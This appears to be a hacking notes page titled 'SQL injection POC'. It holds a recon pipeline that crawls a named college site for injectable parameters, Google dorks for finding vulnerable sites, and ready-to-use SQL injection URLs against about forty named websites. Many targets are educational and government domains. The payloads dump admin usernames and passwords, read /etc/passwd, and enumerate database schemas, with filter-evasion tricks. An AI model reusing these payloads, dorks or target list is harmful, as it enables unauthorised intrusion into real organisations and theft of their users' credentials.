SQL injection POC

echo http://www.kaliachakcollege.edu.in | katana -d 5 -ef png,css,js -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"

Dork for find MYSQL Vuln websites:

site:*.*.com inurl:group_concat(username, filetype:php
inurl:"php?id=" site:example.com
site:*.*.pk inurl:?id= filetype:php

Dork for find MSSQL Vuln websites

site:www.*.edu.pk inurl:?id= ext:asp | ext:aspx
site:www.*.edu.in inurl:?id= filetype:php
site:*.*.in inurl:Product.aspx?Id=

-----------------------------------------------------------

Site-2: Load File /etc/passwd

http://www.way-to-win.com/newindex/info/index_hotnews_mini.php?ln=4&aid=0' union select 1,2,3,4,5,6,7,8,9,10,11,12,load_file('/etc/passwd'),14,15--+

-----------------------------------------------------------

Site-3: www.viangbua.com

https://www.viangbua.com/booking.php?id=-21' union select 1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6,7,8,9,10,11,12 from admin_user--+

-----------------------------------------------------------

Site-4: www.iftinuk.com

http://www.iftinuk.com/display_agents.php?id=-384+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8+from+users

-----------------------------------------------------------

Site-5: www.pudak-scientific.com

https://www.pudak-scientific.com/detail_products.php?id=-132+union+select+1,2,3,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+tSYSUSER)*/,5--+-

-----------------------------------------------------------

Site-6: www.neutralposture.com

https://www.neutralposture.com/_site/about.php?id=-1 union select 1,2,group_concat(username,0x3a,password),4,5,6+from+member

-----------------------------------------------------------

Site-7: www.cordoganclark.com

https://www.cordoganclark.com/newsitem.php?id=-34+union+select+1,2,3,group_concat(username,0x3a,password),5,6+from+auth_user_md5

-----------------------------------------------------------

Site-8: www.braywanderers.com

http://www.braywanderers.com/showarticle.php?id=-227 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email),2 from people--

-----------------------------------------------------------

Site-9: www.cccaust.com

https://www.cccaust.com/church.php?id=3005+union+select+group_concat(username,0x3a,password),2,3,4,5,6,7,8,7,10,11,12,13+from+users+limit+0,1--+-

-----------------------------------------------------------

Site-10 MYSQL:Blind injection: www.intothewildelephantcamp.com

https://www.intothewildelephantcamp.com/gallery-detail.php?id=26%27+and+(select+1+from+dual+where+database()+like+%27_____________%27)--+

-----------------------------------------------------------

Site-10 MYSQL: Error_based-XPATH-EXTRACTVALUE: polymerindustries.in

https://polymerindustries.in/Product.aspx?id=2'+and+extractvalue(0x0a,concat(0x0a,(select+database())))--+&name=ISOPHTHALATES

-----------------------------------------------------------

Site-11 kphcip.gkp.pk

https://kphcip.gkp.pk/image.php?id=-12'union+select+1,2,3,user(),5--+

-----------------------------------------------------------

Site-12 fics.nust.edu.pk

https://fics.nust.edu.pk/event/igs.php?id=-1+Union+Select+1,user(),3,4,5,6

-----------------------------------------------------------

Site-13 sindhculture.gov.pk

https://sindhculture.gov.pk/book.php?id=-1'union+all+select+1,user(),version(),4,5,6,7,8,9--+-

-----------------------------------------------------------

Site-14 ilm.edu.pk

https://ilm.edu.pk/programs.php?id=-8'+/*!50000UniON%20SeLeCt*/+1,2,3,user(),5,6,7,8,9,10,11,12--+

-----------------------------------------------------------

Site-15 www.baqai.edu.pk

https://www.baqai.edu.pk/student-forms.php?id=-28'+union+select+1,user(),3,4,5,6--+

----------------------------------------------------------

Site-16 longlife.com.pk


https://longlife.com.pk/categories.php?id=-2+/*!50000UniON%20SeLeCt*/+1,user(),3,4,5,6

----------------------------------------------------------

Site-17 www.thevision.edu.pk

http://www.thevision.edu.pk/news_details.php?id=-9'/**/union/**/select/**/1,version(),3,4,5,6,7,8--+

----------------------------------------------------------

Site-18 www.alresfordmensshed.org.uk

https://www.alresfordmensshed.org.uk/item.php?i=-125+UNION+ALL+SELECT+1,2,3,4,uuid(),6,7,8,9,10,11,12,13,14,15

----------------------------------------------------------

Site-19 MultiQuery Injection: www.plantandem.be

http://www.plantandem.be/home.php?p=g&id=4--+'and%20false/*!50000union*/select%201,2,3,user(),5,6,7,8,9,10,11--+'

----------------------------------------------------------

Site-20 MultiQuery Injection: www.hnhtech.com

http://www.hnhtech.com/apply_online.php?value=Careers--+%27and+false/*!50000union*/select+1,2,user(),4,5,6--+%27&&id=1

----------------------------------------------------------

Site-21 www.yamaha-friends.com

https://www.yamaha-friends.com/gallery-detail.php?id=-9+Union+select+1,2,user(),4,5,6,7

----------------------------------------------------------

Site-22 MSSQL: www.kpbte.edu.pk

https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1'+and+1=0+union+select+@@version,2,3,4--
https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1%27+and+1=0+union+select+(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH('')),2,3,4--
https://www.kpbte.edu.pk/pages/contactdetails.aspx?id=1%27+and+1=0+union+select+output,2,3,4%20from%20temp_dios_sample--

----------------------------------------------------------

Site-23 MSSQL: Error-Based: www.alazharswat.edu.pk

https://www.alazharswat.edu.pk/relatedaddformgallery.aspx?id=2'+and+1=@@version--
https://www.alazharswat.edu.pk/relatedaddformgallery.aspx?id=2'+and 1=(select+table_name as t+from+information_schema.tables FOR XML PATH(''))--

----------------------------------------------------------

Site-24 www.greenclub.gr

https://www.greenclub.gr/main.php?id=-84+union+select+1,2,3,4,5&lang=el

----------------------------------------------------------

Site-25 revistaramuri.ro

http://revistaramuri.ro/index.php?id=-460+union+select+1,2,3,4,5,6,7--

----------------------------------------------------------

Site-26 www.koracing.net/

https://www.koracing.net/viewproduct.php?folder=5&product=-453+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

----------------------------------------------------------

Site-27 www.casella.com.tr

https://www.casella.com.tr/tr/sayfa.php?id=800004321+Union+Select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

----------------------------------------------------------

Site-28 www.tgophoto.com

https://www.tgophoto.com/m/about.php?id=483'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+

----------------------------------------------------------

Site-29 www.corfis.com

https://www.corfis.com/Sayfa.php?Git=Anasayfa&Sayfa=Read&id=-38'/**/Union/**/All+Select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13--+

----------------------------------------------------------

Site-30 www.swarrnim.edu.in

https://www.swarrnim.edu.in/swarrnim/photogallery-details.php?id=-1'+/*!50000union*/select+1,2,3,user(),5,6,7,8,9,10,11--+

----------------------------------------------------------

Site-31 www.kaliachakcollege.edu.in

http://www.kaliachakcollege.edu.in/view_notice.php?id=-643%27+union+select+1,2,user(),4,5,6--+
https://kaliachakcollege.edu.in/naac_sss/administrator/final_report.php?session=1%27+OR+1=1--+-
https://www.sriramachandra.edu.in/university/rank-list.php?id=390+and+true

----------------------------------------------------------

Site-32 qau.edu.pk

https://qau.edu.pk/lateralentry/viewrecord.php?id=UFM24-06388&list=-1+Union+all+select+1,2,database(),version(),5,@@datadir,user(),8--+

----------------------------------------------------------

Site-34 www.cr-led.com

http://www.cr-led.com/news.php?id=-4 union select 1,2,group_concat(username,password),4,5,6,7,8,9,10,11,12,13 from admin--

----------------------------------------------------------

Site-35 www.webucate.in

https://www.webucate.in/page-category_freeTestSeries.php?catId=42&subCatId=63+and+0+Union+All+Select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+

----------------------------------------------------------

Site-36 www.isu.edu.pk

https://www.isu.edu.pk/facultyMember.php?Id=-71+Union+All+Select+1,version(),3,4,5,6,7--+

----------------------------------------------------------

Site-37 www.slmc.edu.pk

https://www.slmc.edu.pk/hospital.php?id=3'+/**/union/**/select/**/+1,version()--+-

----------------------------------------------------------

Site-38 sw.muet.edu.pk

https://sw.muet.edu.pk/facultydetail.php?id=14

----------------------------------------------------------

Site-39 ccl.edu.pk

https://ccl.edu.pk/profile.php?id=-6'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--+

----------------------------------------------------------

Site-40 margalla.edu.pk

https://margalla.edu.pk/dpt-form/print-profile.php?id=-721'+Union+Select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

----------------------------------------------------------

Site-41 exams.uom.edu.pk

https://exams.uom.edu.pk/results/2022/Bsfall/dmc.php?rollno=35086+OR+1

----------------------------------------------------------

Site-41 www.yamaha-friends.com

https://www.yamaha-friends.com/news-detail.php?id=1%27

----------------------------------------------------------

Site-41 www.embryohotel.com

https://www.embryohotel.com/room-detail.php?id=%27"
PreviousHTML injection POCNextTemplate

Last updated